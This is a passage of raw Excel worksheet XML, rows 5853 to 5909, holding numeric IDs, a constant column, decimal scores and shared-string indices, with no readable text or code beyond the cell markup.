      <c r="A5853" s="1">
        <v>5851</v>
      </c>
      <c r="B5853">
        <v>813</v>
      </c>
      <c r="C5853">
        <v>813</v>
      </c>
      <c r="D5853">
        <v>3</v>
      </c>
      <c r="E5853">
        <v>0.86870002746582031</v>
      </c>
      <c r="F5853" t="s">
        <v>10120</v>
      </c>
      <c r="G5853" t="s">
        <v>11579</v>
      </c>
      <c r="H5853" t="s">
        <v>11580</v>
      </c>
    </row>
    <row r="5854" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5854" s="1">
        <v>5852</v>
      </c>
      <c r="B5854">
        <v>3362</v>
      </c>
      <c r="C5854">
        <v>3362</v>
      </c>
      <c r="D5854">
        <v>3</v>
      </c>
      <c r="E5854">
        <v>0.89529997110366821</v>
      </c>
      <c r="F5854" t="s">
        <v>10120</v>
      </c>
      <c r="G5854" t="s">
        <v>11581</v>
      </c>
      <c r="H5854" t="s">
        <v>11582</v>
      </c>
    </row>
    <row r="5855" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5855" s="1">
        <v>5853</v>
      </c>
      <c r="B5855">
        <v>3363</v>
      </c>
      <c r="C5855">
        <v>3363</v>
      </c>
      <c r="D5855">
        <v>3</v>
      </c>
      <c r="E5855">
        <v>0.4244999885559082</v>
      </c>
      <c r="F5855" t="s">
        <v>10120</v>
      </c>
      <c r="G5855" t="s">
        <v>11583</v>
      </c>
      <c r="H5855" t="s">
        <v>11584</v>
      </c>
    </row>
    <row r="5856" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5856" s="1">
        <v>5854</v>
      </c>
      <c r="B5856">
        <v>837</v>
      </c>
      <c r="C5856">
        <v>837</v>
      </c>
      <c r="D5856">
        <v>3</v>
      </c>
      <c r="E5856">
        <v>0.95899999141693115</v>
      </c>
      <c r="F5856" t="s">
        <v>10120</v>
      </c>
      <c r="G5856" t="s">
        <v>11585</v>
      </c>
      <c r="H5856" t="s">
        <v>11586</v>
      </c>
    </row>
    <row r="5857" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5857" s="1">
        <v>5855</v>
      </c>
      <c r="B5857">
        <v>3364</v>
      </c>
      <c r="C5857">
        <v>3364</v>
      </c>
      <c r="D5857">
        <v>3</v>
      </c>
      <c r="E5857">
        <v>0.88099998235702515</v>
      </c>
      <c r="F5857" t="s">
        <v>10120</v>
      </c>
      <c r="G5857" t="s">
        <v>11587</v>
      </c>
      <c r="H5857" t="s">
        <v>11588</v>
      </c>
    </row>
    <row r="5858" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5858" s="1">
        <v>5856</v>
      </c>
      <c r="B5858">
        <v>3374</v>
      </c>
      <c r="C5858">
        <v>3374</v>
      </c>
      <c r="D5858">
        <v>3</v>
      </c>
      <c r="E5858">
        <v>0.43349999189376831</v>
      </c>
      <c r="F5858" t="s">
        <v>10120</v>
      </c>
      <c r="G5858" t="s">
        <v>11589</v>
      </c>
      <c r="H5858" t="s">
        <v>11590</v>
      </c>
    </row>
    <row r="5859" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5859" s="1">
        <v>5857</v>
      </c>
      <c r="B5859">
        <v>3376</v>
      </c>
      <c r="C5859">
        <v>3376</v>
      </c>
      <c r="D5859">
        <v>3</v>
      </c>
      <c r="E5859">
        <v>0.58149999380111694</v>
      </c>
      <c r="F5859" t="s">
        <v>10120</v>
      </c>
      <c r="G5859" t="s">
        <v>11591</v>
      </c>
      <c r="H5859" t="s">
        <v>11592</v>
      </c>
    </row>
    <row r="5860" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5860" s="1">
        <v>5858</v>
      </c>
      <c r="B5860">
        <v>836</v>
      </c>
      <c r="C5860">
        <v>836</v>
      </c>
      <c r="D5860">
        <v>3</v>
      </c>
      <c r="E5860">
        <v>0.68070000410079956</v>
      </c>
      <c r="F5860" t="s">
        <v>10120</v>
      </c>
      <c r="G5860" t="s">
        <v>11593</v>
      </c>
      <c r="H5860" t="s">
        <v>11594</v>
      </c>
    </row>
    <row r="5861" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5861" s="1">
        <v>5859</v>
      </c>
      <c r="B5861">
        <v>827</v>
      </c>
      <c r="C5861">
        <v>827</v>
      </c>
      <c r="D5861">
        <v>3</v>
      </c>
      <c r="E5861">
        <v>0.64560002088546753</v>
      </c>
      <c r="F5861" t="s">
        <v>10120</v>
      </c>
      <c r="G5861" t="s">
        <v>11595</v>
      </c>
      <c r="H5861" t="s">
        <v>11596</v>
      </c>
    </row>
    <row r="5862" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5862" s="1">
        <v>5860</v>
      </c>
      <c r="B5862">
        <v>3399</v>
      </c>
      <c r="C5862">
        <v>3399</v>
      </c>
      <c r="D5862">
        <v>3</v>
      </c>
      <c r="E5862">
        <v>0.64170002937316895</v>
      </c>
      <c r="F5862" t="s">
        <v>10120</v>
      </c>
      <c r="G5862" t="s">
        <v>11597</v>
      </c>
      <c r="H5862" t="s">
        <v>11598</v>
      </c>
    </row>
    <row r="5863" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5863" s="1">
        <v>5861</v>
      </c>
      <c r="B5863">
        <v>3401</v>
      </c>
      <c r="C5863">
        <v>3401</v>
      </c>
      <c r="D5863">
        <v>3</v>
      </c>
      <c r="E5863">
        <v>0.48530000448226929</v>
      </c>
      <c r="F5863" t="s">
        <v>10120</v>
      </c>
      <c r="G5863" t="s">
        <v>11599</v>
      </c>
      <c r="H5863" t="s">
        <v>11600</v>
      </c>
    </row>
    <row r="5864" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5864" s="1">
        <v>5862</v>
      </c>
      <c r="B5864">
        <v>826</v>
      </c>
      <c r="C5864">
        <v>826</v>
      </c>
      <c r="D5864">
        <v>3</v>
      </c>
      <c r="E5864">
        <v>0.99000000953674316</v>
      </c>
      <c r="F5864" t="s">
        <v>10120</v>
      </c>
      <c r="G5864" t="s">
        <v>11601</v>
      </c>
      <c r="H5864" t="s">
        <v>11602</v>
      </c>
    </row>
    <row r="5865" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5865" s="1">
        <v>5863</v>
      </c>
      <c r="B5865">
        <v>824</v>
      </c>
      <c r="C5865">
        <v>824</v>
      </c>
      <c r="D5865">
        <v>3</v>
      </c>
      <c r="E5865">
        <v>0.95020002126693726</v>
      </c>
      <c r="F5865" t="s">
        <v>10120</v>
      </c>
      <c r="G5865" t="s">
        <v>11603</v>
      </c>
      <c r="H5865" t="s">
        <v>11604</v>
      </c>
    </row>
    <row r="5866" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5866" s="1">
        <v>5864</v>
      </c>
      <c r="B5866">
        <v>821</v>
      </c>
      <c r="C5866">
        <v>821</v>
      </c>
      <c r="D5866">
        <v>3</v>
      </c>
      <c r="E5866">
        <v>0.55239999294281006</v>
      </c>
      <c r="F5866" t="s">
        <v>10120</v>
      </c>
      <c r="G5866" t="s">
        <v>11605</v>
      </c>
      <c r="H5866" t="s">
        <v>11523</v>
      </c>
    </row>
    <row r="5867" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5867" s="1">
        <v>5865</v>
      </c>
      <c r="B5867">
        <v>818</v>
      </c>
      <c r="C5867">
        <v>818</v>
      </c>
      <c r="D5867">
        <v>3</v>
      </c>
      <c r="E5867">
        <v>0.82090002298355103</v>
      </c>
      <c r="F5867" t="s">
        <v>10120</v>
      </c>
      <c r="G5867" t="s">
        <v>11606</v>
      </c>
      <c r="H5867" t="s">
        <v>11607</v>
      </c>
    </row>
    <row r="5868" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5868" s="1">
        <v>5866</v>
      </c>
      <c r="B5868">
        <v>816</v>
      </c>
      <c r="C5868">
        <v>816</v>
      </c>
      <c r="D5868">
        <v>3</v>
      </c>
      <c r="E5868">
        <v>0.68970000743865967</v>
      </c>
      <c r="F5868" t="s">
        <v>10120</v>
      </c>
      <c r="G5868" t="s">
        <v>11608</v>
      </c>
      <c r="H5868" t="s">
        <v>11609</v>
      </c>
    </row>
    <row r="5869" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5869" s="1">
        <v>5867</v>
      </c>
      <c r="B5869">
        <v>3427</v>
      </c>
      <c r="C5869">
        <v>3427</v>
      </c>
      <c r="D5869">
        <v>3</v>
      </c>
      <c r="E5869">
        <v>0.99479997158050537</v>
      </c>
      <c r="F5869" t="s">
        <v>10120</v>
      </c>
      <c r="G5869" t="s">
        <v>11610</v>
      </c>
      <c r="H5869" t="s">
        <v>11611</v>
      </c>
    </row>
    <row r="5870" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5870" s="1">
        <v>5868</v>
      </c>
      <c r="B5870">
        <v>3428</v>
      </c>
      <c r="C5870">
        <v>3428</v>
      </c>
      <c r="D5870">
        <v>3</v>
      </c>
      <c r="E5870">
        <v>0.69050002098083496</v>
      </c>
      <c r="F5870" t="s">
        <v>10120</v>
      </c>
      <c r="G5870" t="s">
        <v>11612</v>
      </c>
      <c r="H5870" t="s">
        <v>11613</v>
      </c>
    </row>
    <row r="5871" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5871" s="1">
        <v>5869</v>
      </c>
      <c r="B5871">
        <v>3436</v>
      </c>
      <c r="C5871">
        <v>3436</v>
      </c>
      <c r="D5871">
        <v>3</v>
      </c>
      <c r="E5871">
        <v>0.84160000085830688</v>
      </c>
      <c r="F5871" t="s">
        <v>10120</v>
      </c>
      <c r="G5871" t="s">
        <v>11614</v>
      </c>
      <c r="H5871" t="s">
        <v>11615</v>
      </c>
    </row>
    <row r="5872" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5872" s="1">
        <v>5870</v>
      </c>
      <c r="B5872">
        <v>788</v>
      </c>
      <c r="C5872">
        <v>788</v>
      </c>
      <c r="D5872">
        <v>3</v>
      </c>
      <c r="E5872">
        <v>0.5195000171661377</v>
      </c>
      <c r="F5872" t="s">
        <v>10120</v>
      </c>
      <c r="G5872" t="s">
        <v>11616</v>
      </c>
      <c r="H5872" t="s">
        <v>11617</v>
      </c>
    </row>
    <row r="5873" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5873" s="1">
        <v>5871</v>
      </c>
      <c r="B5873">
        <v>787</v>
      </c>
      <c r="C5873">
        <v>787</v>
      </c>
      <c r="D5873">
        <v>3</v>
      </c>
      <c r="E5873">
        <v>0.80489999055862427</v>
      </c>
      <c r="F5873" t="s">
        <v>10120</v>
      </c>
      <c r="G5873" t="s">
        <v>11618</v>
      </c>
      <c r="H5873" t="s">
        <v>11619</v>
      </c>
    </row>
    <row r="5874" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5874" s="1">
        <v>5872</v>
      </c>
      <c r="B5874">
        <v>781</v>
      </c>
      <c r="C5874">
        <v>781</v>
      </c>
      <c r="D5874">
        <v>3</v>
      </c>
      <c r="E5874">
        <v>0.99659997224807739</v>
      </c>
      <c r="F5874" t="s">
        <v>10120</v>
      </c>
      <c r="G5874" t="s">
        <v>11620</v>
      </c>
      <c r="H5874" t="s">
        <v>11621</v>
      </c>
    </row>
    <row r="5875" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5875" s="1">
        <v>5873</v>
      </c>
      <c r="B5875">
        <v>3656</v>
      </c>
      <c r="C5875">
        <v>3656</v>
      </c>
      <c r="D5875">
        <v>3</v>
      </c>
      <c r="E5875">
        <v>0.86080002784729004</v>
      </c>
      <c r="F5875" t="s">
        <v>10120</v>
      </c>
      <c r="G5875" t="s">
        <v>11622</v>
      </c>
      <c r="H5875" t="s">
        <v>11623</v>
      </c>
    </row>
    <row r="5876" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5876" s="1">
        <v>5874</v>
      </c>
      <c r="B5876">
        <v>3658</v>
      </c>
      <c r="C5876">
        <v>3658</v>
      </c>
      <c r="D5876">
        <v>3</v>
      </c>
      <c r="E5876">
        <v>0.83069998025894165</v>
      </c>
      <c r="F5876" t="s">
        <v>10120</v>
      </c>
      <c r="G5876" t="s">
        <v>11624</v>
      </c>
      <c r="H5876" t="s">
        <v>11625</v>
      </c>
    </row>
    <row r="5877" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5877" s="1">
        <v>5875</v>
      </c>
      <c r="B5877">
        <v>752</v>
      </c>
      <c r="C5877">
        <v>752</v>
      </c>
      <c r="D5877">
        <v>3</v>
      </c>
      <c r="E5877">
        <v>0.98530000448226929</v>
      </c>
      <c r="F5877" t="s">
        <v>10120</v>
      </c>
      <c r="G5877" t="s">
        <v>11626</v>
      </c>
      <c r="H5877" t="s">
        <v>11627</v>
      </c>
    </row>
    <row r="5878" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5878" s="1">
        <v>5876</v>
      </c>
      <c r="B5878">
        <v>3661</v>
      </c>
      <c r="C5878">
        <v>3661</v>
      </c>
      <c r="D5878">
        <v>3</v>
      </c>
      <c r="E5878">
        <v>0.99910002946853638</v>
      </c>
      <c r="F5878" t="s">
        <v>10120</v>
      </c>
      <c r="G5878" t="s">
        <v>11628</v>
      </c>
      <c r="H5878" t="s">
        <v>11629</v>
      </c>
    </row>
    <row r="5879" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5879" s="1">
        <v>5877</v>
      </c>
      <c r="B5879">
        <v>751</v>
      </c>
      <c r="C5879">
        <v>751</v>
      </c>
      <c r="D5879">
        <v>3</v>
      </c>
      <c r="E5879">
        <v>0.52029997110366821</v>
      </c>
      <c r="F5879" t="s">
        <v>10120</v>
      </c>
      <c r="G5879" t="s">
        <v>11630</v>
      </c>
      <c r="H5879" t="s">
        <v>11631</v>
      </c>
    </row>
    <row r="5880" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5880" s="1">
        <v>5878</v>
      </c>
      <c r="B5880">
        <v>3663</v>
      </c>
      <c r="C5880">
        <v>3663</v>
      </c>
      <c r="D5880">
        <v>3</v>
      </c>
      <c r="E5880">
        <v>0.59549999237060547</v>
      </c>
      <c r="F5880" t="s">
        <v>10120</v>
      </c>
      <c r="G5880" t="s">
        <v>11632</v>
      </c>
      <c r="H5880" t="s">
        <v>11633</v>
      </c>
    </row>
    <row r="5881" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5881" s="1">
        <v>5879</v>
      </c>
      <c r="B5881">
        <v>3666</v>
      </c>
      <c r="C5881">
        <v>3666</v>
      </c>
      <c r="D5881">
        <v>3</v>
      </c>
      <c r="E5881">
        <v>0.56669998168945313</v>
      </c>
      <c r="F5881" t="s">
        <v>10120</v>
      </c>
      <c r="G5881" t="s">
        <v>11634</v>
      </c>
      <c r="H5881" t="s">
        <v>11635</v>
      </c>
    </row>
    <row r="5882" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5882" s="1">
        <v>5880</v>
      </c>
      <c r="B5882">
        <v>746</v>
      </c>
      <c r="C5882">
        <v>746</v>
      </c>
      <c r="D5882">
        <v>3</v>
      </c>
      <c r="E5882">
        <v>0.63120001554489136</v>
      </c>
      <c r="F5882" t="s">
        <v>10120</v>
      </c>
      <c r="G5882" t="s">
        <v>11636</v>
      </c>
      <c r="H5882" t="s">
        <v>11637</v>
      </c>
    </row>
    <row r="5883" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5883" s="1">
        <v>5881</v>
      </c>
      <c r="B5883">
        <v>741</v>
      </c>
      <c r="C5883">
        <v>741</v>
      </c>
      <c r="D5883">
        <v>3</v>
      </c>
      <c r="E5883">
        <v>0.97430002689361572</v>
      </c>
      <c r="F5883" t="s">
        <v>10120</v>
      </c>
      <c r="G5883" t="s">
        <v>11638</v>
      </c>
      <c r="H5883" t="s">
        <v>11639</v>
      </c>
    </row>
    <row r="5884" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5884" s="1">
        <v>5882</v>
      </c>
      <c r="B5884">
        <v>3668</v>
      </c>
      <c r="C5884">
        <v>3668</v>
      </c>
      <c r="D5884">
        <v>3</v>
      </c>
      <c r="E5884">
        <v>0.9944000244140625</v>
      </c>
      <c r="F5884" t="s">
        <v>10120</v>
      </c>
      <c r="G5884" t="s">
        <v>11640</v>
      </c>
      <c r="H5884" t="s">
        <v>11641</v>
      </c>
    </row>
    <row r="5885" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5885" s="1">
        <v>5883</v>
      </c>
      <c r="B5885">
        <v>739</v>
      </c>
      <c r="C5885">
        <v>739</v>
      </c>
      <c r="D5885">
        <v>3</v>
      </c>
      <c r="E5885">
        <v>0.64840000867843628</v>
      </c>
      <c r="F5885" t="s">
        <v>10120</v>
      </c>
      <c r="G5885" t="s">
        <v>11642</v>
      </c>
      <c r="H5885" t="s">
        <v>11643</v>
      </c>
    </row>
    <row r="5886" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5886" s="1">
        <v>5884</v>
      </c>
      <c r="B5886">
        <v>3676</v>
      </c>
      <c r="C5886">
        <v>3676</v>
      </c>
      <c r="D5886">
        <v>3</v>
      </c>
      <c r="E5886">
        <v>0.96439999341964722</v>
      </c>
      <c r="F5886" t="s">
        <v>10120</v>
      </c>
      <c r="G5886" t="s">
        <v>11644</v>
      </c>
      <c r="H5886" t="s">
        <v>11645</v>
      </c>
    </row>
    <row r="5887" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5887" s="1">
        <v>5885</v>
      </c>
      <c r="B5887">
        <v>3682</v>
      </c>
      <c r="C5887">
        <v>3682</v>
      </c>
      <c r="D5887">
        <v>3</v>
      </c>
      <c r="E5887">
        <v>0.72990000247955322</v>
      </c>
      <c r="F5887" t="s">
        <v>10120</v>
      </c>
      <c r="G5887" t="s">
        <v>11646</v>
      </c>
      <c r="H5887" t="s">
        <v>11647</v>
      </c>
    </row>
    <row r="5888" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5888" s="1">
        <v>5886</v>
      </c>
      <c r="B5888">
        <v>735</v>
      </c>
      <c r="C5888">
        <v>735</v>
      </c>
      <c r="D5888">
        <v>3</v>
      </c>
      <c r="E5888">
        <v>0.99449998140335083</v>
      </c>
      <c r="F5888" t="s">
        <v>10120</v>
      </c>
      <c r="G5888" t="s">
        <v>11648</v>
      </c>
      <c r="H5888" t="s">
        <v>11649</v>
      </c>
    </row>
    <row r="5889" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5889" s="1">
        <v>5887</v>
      </c>
      <c r="B5889">
        <v>734</v>
      </c>
      <c r="C5889">
        <v>734</v>
      </c>
      <c r="D5889">
        <v>3</v>
      </c>
      <c r="E5889">
        <v>0.86269998550415039</v>
      </c>
      <c r="F5889" t="s">
        <v>10120</v>
      </c>
      <c r="G5889" t="s">
        <v>11650</v>
      </c>
      <c r="H5889" t="s">
        <v>11651</v>
      </c>
    </row>
    <row r="5890" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5890" s="1">
        <v>5888</v>
      </c>
      <c r="B5890">
        <v>3684</v>
      </c>
      <c r="C5890">
        <v>3684</v>
      </c>
      <c r="D5890">
        <v>3</v>
      </c>
      <c r="E5890">
        <v>0.74479997158050537</v>
      </c>
      <c r="F5890" t="s">
        <v>10120</v>
      </c>
      <c r="G5890" t="s">
        <v>11652</v>
      </c>
      <c r="H5890" t="s">
        <v>11653</v>
      </c>
    </row>
    <row r="5891" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5891" s="1">
        <v>5889</v>
      </c>
      <c r="B5891">
        <v>3687</v>
      </c>
      <c r="C5891">
        <v>3687</v>
      </c>
      <c r="D5891">
        <v>3</v>
      </c>
      <c r="E5891">
        <v>0.93010002374649048</v>
      </c>
      <c r="F5891" t="s">
        <v>10120</v>
      </c>
      <c r="G5891" t="s">
        <v>11654</v>
      </c>
      <c r="H5891" t="s">
        <v>11655</v>
      </c>
    </row>
    <row r="5892" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5892" s="1">
        <v>5890</v>
      </c>
      <c r="B5892">
        <v>1660</v>
      </c>
      <c r="C5892">
        <v>1660</v>
      </c>
      <c r="D5892">
        <v>3</v>
      </c>
      <c r="E5892">
        <v>0.7476000189781189</v>
      </c>
      <c r="F5892" t="s">
        <v>10120</v>
      </c>
      <c r="G5892" t="s">
        <v>11656</v>
      </c>
      <c r="H5892" t="s">
        <v>11657</v>
      </c>
    </row>
    <row r="5893" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5893" s="1">
        <v>5891</v>
      </c>
      <c r="B5893">
        <v>3651</v>
      </c>
      <c r="C5893">
        <v>3651</v>
      </c>
      <c r="D5893">
        <v>3</v>
      </c>
      <c r="E5893">
        <v>0.6381000280380249</v>
      </c>
      <c r="F5893" t="s">
        <v>10120</v>
      </c>
      <c r="G5893" t="s">
        <v>11658</v>
      </c>
      <c r="H5893" t="s">
        <v>11659</v>
      </c>
    </row>
    <row r="5894" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5894" s="1">
        <v>5892</v>
      </c>
      <c r="B5894">
        <v>756</v>
      </c>
      <c r="C5894">
        <v>756</v>
      </c>
      <c r="D5894">
        <v>3</v>
      </c>
      <c r="E5894">
        <v>0.5494999885559082</v>
      </c>
      <c r="F5894" t="s">
        <v>10120</v>
      </c>
      <c r="G5894" t="s">
        <v>11660</v>
      </c>
      <c r="H5894" t="s">
        <v>11661</v>
      </c>
    </row>
    <row r="5895" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5895" s="1">
        <v>5893</v>
      </c>
      <c r="B5895">
        <v>3643</v>
      </c>
      <c r="C5895">
        <v>3643</v>
      </c>
      <c r="D5895">
        <v>3</v>
      </c>
      <c r="E5895">
        <v>0.86440002918243408</v>
      </c>
      <c r="F5895" t="s">
        <v>10120</v>
      </c>
      <c r="G5895" t="s">
        <v>11662</v>
      </c>
      <c r="H5895" t="s">
        <v>11663</v>
      </c>
    </row>
    <row r="5896" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5896" s="1">
        <v>5894</v>
      </c>
      <c r="B5896">
        <v>3572</v>
      </c>
      <c r="C5896">
        <v>3572</v>
      </c>
      <c r="D5896">
        <v>3</v>
      </c>
      <c r="E5896">
        <v>0.45719999074935908</v>
      </c>
      <c r="F5896" t="s">
        <v>10120</v>
      </c>
      <c r="G5896" t="s">
        <v>11664</v>
      </c>
      <c r="H5896" t="s">
        <v>11665</v>
      </c>
    </row>
    <row r="5897" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5897" s="1">
        <v>5895</v>
      </c>
      <c r="B5897">
        <v>3573</v>
      </c>
      <c r="C5897">
        <v>3573</v>
      </c>
      <c r="D5897">
        <v>3</v>
      </c>
      <c r="E5897">
        <v>0.76590001583099365</v>
      </c>
      <c r="F5897" t="s">
        <v>10120</v>
      </c>
      <c r="G5897" t="s">
        <v>11666</v>
      </c>
      <c r="H5897" t="s">
        <v>11667</v>
      </c>
    </row>
    <row r="5898" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5898" s="1">
        <v>5896</v>
      </c>
      <c r="B5898">
        <v>3575</v>
      </c>
      <c r="C5898">
        <v>3575</v>
      </c>
      <c r="D5898">
        <v>3</v>
      </c>
      <c r="E5898">
        <v>0.5187000036239624</v>
      </c>
      <c r="F5898" t="s">
        <v>10120</v>
      </c>
      <c r="G5898" t="s">
        <v>11668</v>
      </c>
      <c r="H5898" t="s">
        <v>11669</v>
      </c>
    </row>
    <row r="5899" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5899" s="1">
        <v>5897</v>
      </c>
      <c r="B5899">
        <v>3586</v>
      </c>
      <c r="C5899">
        <v>3586</v>
      </c>
      <c r="D5899">
        <v>3</v>
      </c>
      <c r="E5899">
        <v>0.5471000075340271</v>
      </c>
      <c r="F5899" t="s">
        <v>10120</v>
      </c>
      <c r="G5899" t="s">
        <v>11670</v>
      </c>
      <c r="H5899" t="s">
        <v>11671</v>
      </c>
    </row>
    <row r="5900" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5900" s="1">
        <v>5898</v>
      </c>
      <c r="B5900">
        <v>3597</v>
      </c>
      <c r="C5900">
        <v>3597</v>
      </c>
      <c r="D5900">
        <v>3</v>
      </c>
      <c r="E5900">
        <v>0.81190001964569092</v>
      </c>
      <c r="F5900" t="s">
        <v>10120</v>
      </c>
      <c r="G5900" t="s">
        <v>11672</v>
      </c>
      <c r="H5900" t="s">
        <v>11673</v>
      </c>
    </row>
    <row r="5901" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5901" s="1">
        <v>5899</v>
      </c>
      <c r="B5901">
        <v>3600</v>
      </c>
      <c r="C5901">
        <v>3600</v>
      </c>
      <c r="D5901">
        <v>3</v>
      </c>
      <c r="E5901">
        <v>0.38690000772476202</v>
      </c>
      <c r="F5901" t="s">
        <v>10120</v>
      </c>
      <c r="G5901" t="s">
        <v>11674</v>
      </c>
      <c r="H5901" t="s">
        <v>11675</v>
      </c>
    </row>
    <row r="5902" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5902" s="1">
        <v>5900</v>
      </c>
      <c r="B5902">
        <v>774</v>
      </c>
      <c r="C5902">
        <v>774</v>
      </c>
      <c r="D5902">
        <v>3</v>
      </c>
      <c r="E5902">
        <v>0.83319997787475586</v>
      </c>
      <c r="F5902" t="s">
        <v>10120</v>
      </c>
      <c r="G5902" t="s">
        <v>11676</v>
      </c>
      <c r="H5902" t="s">
        <v>11677</v>
      </c>
    </row>
    <row r="5903" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5903" s="1">
        <v>5901</v>
      </c>
      <c r="B5903">
        <v>3612</v>
      </c>
      <c r="C5903">
        <v>3612</v>
      </c>
      <c r="D5903">
        <v>3</v>
      </c>
      <c r="E5903">
        <v>0.55010002851486206</v>
      </c>
      <c r="F5903" t="s">
        <v>10120</v>
      </c>
      <c r="G5903" t="s">
        <v>11678</v>
      </c>
      <c r="H5903" t="s">
        <v>11679</v>
      </c>
    </row>
    <row r="5904" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5904" s="1">
        <v>5902</v>
      </c>
      <c r="B5904">
        <v>841</v>
      </c>
      <c r="C5904">
        <v>841</v>
      </c>
      <c r="D5904">
        <v>3</v>
      </c>
      <c r="E5904">
        <v>0.99910002946853638</v>
      </c>
      <c r="F5904" t="s">
        <v>10120</v>
      </c>
      <c r="G5904" t="s">
        <v>11680</v>
      </c>
      <c r="H5904" t="s">
        <v>11681</v>
      </c>
    </row>
    <row r="5905" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5905" s="1">
        <v>5903</v>
      </c>
      <c r="B5905">
        <v>3623</v>
      </c>
      <c r="C5905">
        <v>3623</v>
      </c>
      <c r="D5905">
        <v>3</v>
      </c>
      <c r="E5905">
        <v>0.97020000219345093</v>
      </c>
      <c r="F5905" t="s">
        <v>10120</v>
      </c>
      <c r="G5905" t="s">
        <v>11682</v>
      </c>
      <c r="H5905" t="s">
        <v>11683</v>
      </c>
    </row>
    <row r="5906" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5906" s="1">
        <v>5904</v>
      </c>
      <c r="B5906">
        <v>3629</v>
      </c>
      <c r="C5906">
        <v>3629</v>
      </c>
      <c r="D5906">
        <v>3</v>
      </c>
      <c r="E5906">
        <v>0.9968000054359436</v>
      </c>
      <c r="F5906" t="s">
        <v>10120</v>
      </c>
      <c r="G5906" t="s">
        <v>11684</v>
      </c>
      <c r="H5906" t="s">
        <v>11685</v>
      </c>
    </row>
    <row r="5907" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5907" s="1">
        <v>5905</v>
      </c>
      <c r="B5907">
        <v>766</v>
      </c>
      <c r="C5907">
        <v>766</v>
      </c>
      <c r="D5907">
        <v>3</v>
      </c>
      <c r="E5907">
        <v>0.53630000352859497</v>
      </c>
      <c r="F5907" t="s">
        <v>10120</v>
      </c>
      <c r="G5907" t="s">
        <v>11686</v>
      </c>
      <c r="H5907" t="s">
        <v>11687</v>
      </c>
    </row>
    <row r="5908" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5908" s="1">
        <v>5906</v>
      </c>
      <c r="B5908">
        <v>3634</v>
      </c>
      <c r="C5908">
        <v>3634</v>
      </c>
      <c r="D5908">
        <v>3</v>
      </c>
      <c r="E5908">
        <v>0.64620000123977661</v>
      </c>
      <c r="F5908" t="s">
        <v>10120</v>
      </c>
      <c r="G5908" t="s">
        <v>11688</v>
      </c>
      <c r="H5908" t="s">
        <v>11689</v>
      </c>
    </row>
    <row r="5909" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5909" s="1">
        <v>5907</v>
      </c>
      <c r="B5909">
        <v>764</v>
      </c>
      <c r="C5909">
        <v>764</v>
      </c>
      <c r="D5909">
        <v>3</v>
      </c>
      <c r="E5909">
        <v>0.49660000205039978</v>
      </c>
      <c r="F5909" t="s">
        <v>10120</v>
      </c>
      <c r="G5909" t="s">
        <v>11690</v>
      </c>
      <c r="H5909" t="s">
        <v>11691</v>
      </c>
    </row>
    <row r="5910" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5910" s="1">
        <v>5908</v>
      </c>
      <c r="B5910">
        <v>3636</v>
      </c>
      <c r="C5910">
        <v>3636</v>
      </c>
      <c r="D5910">
        <v>3</v>
      </c>
      <c r="E5910">
        <v>0.73589998483657837</v>
      </c>
      <c r="F5910" t="s">
        <v>10120</v>
      </c>
      <c r="G5910" t="s">
        <v>11692</v>
      </c>
      <c r="H5910" t="s">
        <v>11693</v>
      </c>
    </row>
    <row r="5911" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5911" s="1">
        <v>5909</v>
      </c>
      <c r="B5911">
        <v>3637</v>
      </c>
      <c r="C5911">
        <v>3637</v>
      </c>
      <c r="D5911">
        <v>3</v>
      </c>
      <c r="E5911">
        <v>0.59899997711181641</v>
      </c>
